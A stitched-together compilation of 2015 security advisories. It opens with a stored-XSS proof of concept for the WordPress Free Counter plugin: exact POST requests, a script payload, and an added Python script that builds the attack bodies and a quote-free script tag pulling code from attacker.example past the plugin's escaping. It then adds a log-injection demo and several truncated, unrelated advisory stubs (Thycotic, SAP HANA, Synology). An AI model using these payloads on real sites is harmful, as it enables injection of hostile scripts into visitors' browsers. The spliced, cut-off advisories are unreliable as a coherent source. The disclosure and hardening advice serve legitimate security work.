# Exploit Title: WordPress Free Counter Plugin [Stored XSS]
# Date: 2015/05/25
# Exploit Author: Panagiotis Vagenas
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://www.free-counter.org
# Software Link: https://wordpress.org/plugins/free-counter/
# Version: 1.1
# Tested on: WordPress 4.2.2
# Category: webapps
# CVE: CVE-2015-4084

1. Description

Any authenticated or unauthenticated user can perform a stored XSS attack simply by exploiting the wp_ajax_nopriv_check_stat action. The plugin uses a widget to display the website's visits, so any page that contains this widget will also load the malicious JS code.

2. Proof of Concept

* Send a POST request to `http://www.free-counter.org/Api.php` in order to reveal the counter id of the vulnerable site. The POST data must contain the following vars: `action=create_new_counter&site_url=http%3A%2f%2fmy.vulnerable.website.com`
* The response is a serialized indexed array. The value we need is 'counter_id'.
* Send a POST request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: `action=check_stat&id_counter=<counter_id from step 2>&value_=<script>alert(1)</script>`
* Visit a page of the infected website that displays the plugin's widget.

Note that the plugin uses the update_option function to store the $_POST['value_'] contents in the DB, so quotes in any code inserted there will be escaped. However, a malicious user can simply omit the quotes around the src attribute of the script tag; most modern browsers will treat the tag as though the quotes were there.

3. Solution

No official solution yet exists.
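The PoC above as an offline, runnable walk-through. This is an added example, not the advisory's or the plugin's code: it parses a PHP-serialized API reply, builds the two POST bodies exactly as the steps describe, and shows why the escaping mentioned in the note leaves a quote-free `<script src=...>` payload intact. The reply format is an assumption (the advisory only says "serialized array" with a 'counter_id' key) and SAMPLE_API_RESPONSE is constructed to it; no network requests are made.

```python
"""Offline walk-through of the Free Counter stored-XSS PoC.

Added example, not the advisory's or the plugin's code. It assumes the
counter API replies with a PHP-serialized array holding a 'counter_id'
key; SAMPLE_API_RESPONSE below is constructed to that assumption.
No requests are sent: the functions only parse a reply and build bodies.
"""
import re
from urllib.parse import urlencode

# Constructed sample reply from Api.php (format assumed, see docstring).
SAMPLE_API_RESPONSE = b'a:2:{s:10:"counter_id";i:123456;s:6:"status";s:2:"ok";}'


def php_unserialize(data: bytes):
    """Minimal PHP unserialize(): ints, bools, floats, null, strings, arrays.

    Strings are length-prefixed, so a value may contain ';' or '"' without
    confusing the parser; naive splitting on ';' would break on such input.
    """
    pos = 0

    def parse():
        nonlocal pos
        t = data[pos:pos + 1]
        if t == b'i':
            end = data.index(b';', pos)
            value = int(data[pos + 2:end])
            pos = end + 1
            return value
        if t == b'b':
            end = data.index(b';', pos)
            value = data[pos + 2:end] == b'1'
            pos = end + 1
            return value
        if t == b'd':
            end = data.index(b';', pos)
            value = float(data[pos + 2:end])
            pos = end + 1
            return value
        if t == b'N':
            pos += 2                      # 'N;'
            return None
        if t == b's':
            colon = data.index(b':', pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2             # skip ':"'
            value = data[start:start + length].decode('utf-8', 'replace')
            pos = start + length + 2      # skip '";'
            return value
        if t == b'a':
            colon = data.index(b':', pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2               # skip ':{'
            result = {}
            for _ in range(count):
                key = parse()
                result[key] = parse()
            pos += 1                      # skip '}'
            return result
        raise ValueError('unsupported PHP type %r at offset %d' % (t, pos))

    return parse()


def counter_id_from_response(body: bytes) -> int:
    """Step 2 of the PoC: pull 'counter_id' out of the API reply."""
    return int(php_unserialize(body)['counter_id'])


def build_create_counter_body(site_url: str) -> str:
    """Step 1: POST body for Api.php that reveals the site's counter id."""
    return urlencode({'action': 'create_new_counter', 'site_url': site_url})


def build_check_stat_body(counter_id: int, payload: str) -> str:
    """Step 3: POST body for admin-ajax.php; value_ is stored via
    update_option and later echoed by the widget (the stored-XSS sink)."""
    return urlencode({'action': 'check_stat', 'id_counter': counter_id,
                      'value_': payload})


def addslashes(value: str) -> str:
    """PHP addslashes(): the escaping the advisory says the stored value
    receives (quotes, backslashes and NUL get a leading backslash)."""
    return re.sub(r'(["\'\\])', r'\\\1', value).replace('\0', '\\0')


QUOTED_PAYLOAD = '<script src="//attacker.example/x.js"></script>'
UNQUOTED_PAYLOAD = '<script src=//attacker.example/x.js></script>'


def survives_addslashes(payload: str) -> bool:
    """True when the escaping leaves the payload byte-for-byte intact."""
    return addslashes(payload) == payload


if __name__ == '__main__':
    cid = counter_id_from_response(SAMPLE_API_RESPONSE)
    print(build_create_counter_body('http://my.vulnerable.website.com'))
    print(build_check_stat_body(cid, UNQUOTED_PAYLOAD))
    for p in (QUOTED_PAYLOAD, UNQUOTED_PAYLOAD):
        print(survives_addslashes(p), addslashes(p))
```

The escaping the advisory mentions only touches quotes and backslashes, which is why `survives_addslashes` is true for the quote-free variant and the widget still emits a working script tag. The hardening a plugin author would apply (my suggestion, not a vendor fix, since none exists) is to validate `value_` as the integer a visit counter expects (WordPress `absint()`) before `update_option`, escape on output with `esc_html()` in the widget, and drop the `wp_ajax_nopriv_` handler or protect it with a nonce and capability check.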
Thycotic Password Manager Secret Server iOS Application - MITM SSL Certificate Vulnerability
--
http://www.info-sec.ca/advisories/Thycotic-SecretServer.html

Overview

"With the Password Manager Secret Server app, you can access passwords for an EXISTING on-premise Secret Server or Secret Server Online account."

"This password app combines enterprise-level security with home-user simplicity, making it a convenient choice for both IT professionals AND home users."

"Count on Extreme Security:
Your passwords are safely stored on a secure server-not on your phone.
You get top-level AES 256 bit encryption.
You get a personal pin code lock for an additional layer of security.
A built-in password generator creates strong, unique passwords.
Your data is backed by a leading enterprise password management platform."

"Safe Storage for:
Enterprise-level or personal passwords.
Bank account and tax numbers.
ATM Pins.
Social security numbers.
Credit card numbers.
Combination lock numbers"
Onapsis Security Advisory ONAPSIS-2015-007: SAP HANA Log Injection Vulnerability

1. Impact on Business
=====================

Under certain conditions the SAP HANA XS engine is vulnerable to arbitrary log injection, allowing remote authenticated attackers to write arbitrary information in log files.

This could be used to corrupt log files or to add fake content that misleads an administrator.

Risk Level: Medium

2. Advisory Information
=======================

- Public Release Date: 2015-05-27
- Subscriber Notification Date: 2015-05-27
- Last Revised: 2015-05-27
- Security Advisory ID: ONAPSIS-2015-007
- Onapsis SVS ID: ONAPSIS-00140
- CVE: CVE-2015-3994
- Researcher: Fernando Russ, Nahuel D. Sánchez
- Initial Base CVSS v2: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N)
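The failure mode the advisory describes (attacker-controlled data reaching a log file verbatim, so an extra CR/LF fabricates a whole entry an administrator will trust) shown on a toy log, as an added example. This is not Onapsis or SAP code and it does not model the XS engine: the advisory gives no detail on which field is written unsanitized, so the entry format, the `user=` field and the inputs below are all constructed for illustration.

```python
"""Log injection and its mitigation on a toy, line-oriented log.

Added example, not Onapsis or SAP code. The entry format, the field
names and every input below are constructed; the XS engine's real log
layout is not described in the advisory.
"""
import re

# Hypothetical entry layout: timestamp, level, user field, free-text message.
ENTRY_RE = re.compile(
    r'^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z \[(INFO|WARN|ERROR)\] ')


def format_entry_unsafe(ts: str, level: str, user: str, msg: str) -> str:
    """Vulnerable: untrusted fields are written verbatim, so a CR/LF in
    `user` terminates this entry and starts one the attacker dictates."""
    return f"{ts} [{level}] user={user} {msg}\n"


def _escape_char(ch: str) -> str:
    code = ord(ch)
    return '\\x%02x' % code if code < 0x100 else '\\u%04x' % code


def neutralize(field: str) -> str:
    """Encode CR, LF and every other non-printable character so a field
    can never span more than one physical line in the log."""
    return ''.join(
        ch if ch.isprintable() and ch not in '\r\n' else _escape_char(ch)
        for ch in field)


def format_entry_safe(ts: str, level: str, user: str, msg: str) -> str:
    """Hardened: each untrusted field is neutralized before formatting.
    (A production logger would also quote fields so embedded spaces
    cannot shift the column layout; line integrity is the point here.)"""
    return f"{ts} [{level}] user={neutralize(user)} {neutralize(msg)}\n"


def parse_entries(log_text: str) -> list:
    """What a log consumer (or an administrator) sees: one record per
    physical line that matches the entry layout."""
    records = []
    for line in log_text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        user_field, _, msg = line[m.end():].partition(' ')
        records.append({'level': m.group(1),
                        'user': user_field[len('user='):],
                        'msg': msg})
    return records


# Constructed attacker input: a username carrying CR/LF plus a forged entry
# that claims an administrator logged in successfully.
ATTACKER_USER = 'alice\r\n2015-05-27T10:00:01Z [INFO] user=admin login ok'
TS = '2015-05-27T10:00:00Z'

UNSAFE_LOG = format_entry_unsafe(TS, 'WARN', ATTACKER_USER, 'login failed')
SAFE_LOG = format_entry_safe(TS, 'WARN', ATTACKER_USER, 'login failed')


if __name__ == '__main__':
    print('unsafe logger records:', parse_entries(UNSAFE_LOG))
    print('safe logger records:  ', parse_entries(SAFE_LOG))
```

Run stand-alone, the unsafe log yields two records and the second one reads as a genuine `admin` login; the safe log yields one record whose user field visibly contains `\x0d\x0a`, so the forgery is both prevented and evident on inspection.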
Onapsis Security Advisory ONAPSIS-2015-006: SAP HANA Information Disclosure via SQL IMPORT FROM statement

1. Impact on Business
=====================

Under certain conditions some SAP HANA Database commands could be abused by a remote authenticated attacker to access information which is restricted.

This could be used to gain access to confidential information.

Risk Level: Medium

2. Advisory Information
=======================

- Public Release Date: 2015-05-27
- Subscriber Notification Date: 2015-05-27
- Last Revised: 2015-05-27
- Security Advisory ID: ONAPSIS-2015-006
- Onapsis SVS ID: ONAPSIS-00142
- CVE: CVE-2015-3995
- Researcher: Sergio Abraham, Fernando Russ, Nahuel D. Sánchez
- Initial Base CVSS v2: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
------------------------------------------------------------------------
Command injection vulnerability in Synology Photo Station
------------------------------------------------------------------------
Han Sahin, May 2015
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS.
------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was tested on Synology Photo Station version 6.2-2858.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Synology reports that this issue has been resolved in Photo Station version 6.3-2945.
https://www.synology.com/en-us/releaseNote/PhotoStation
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html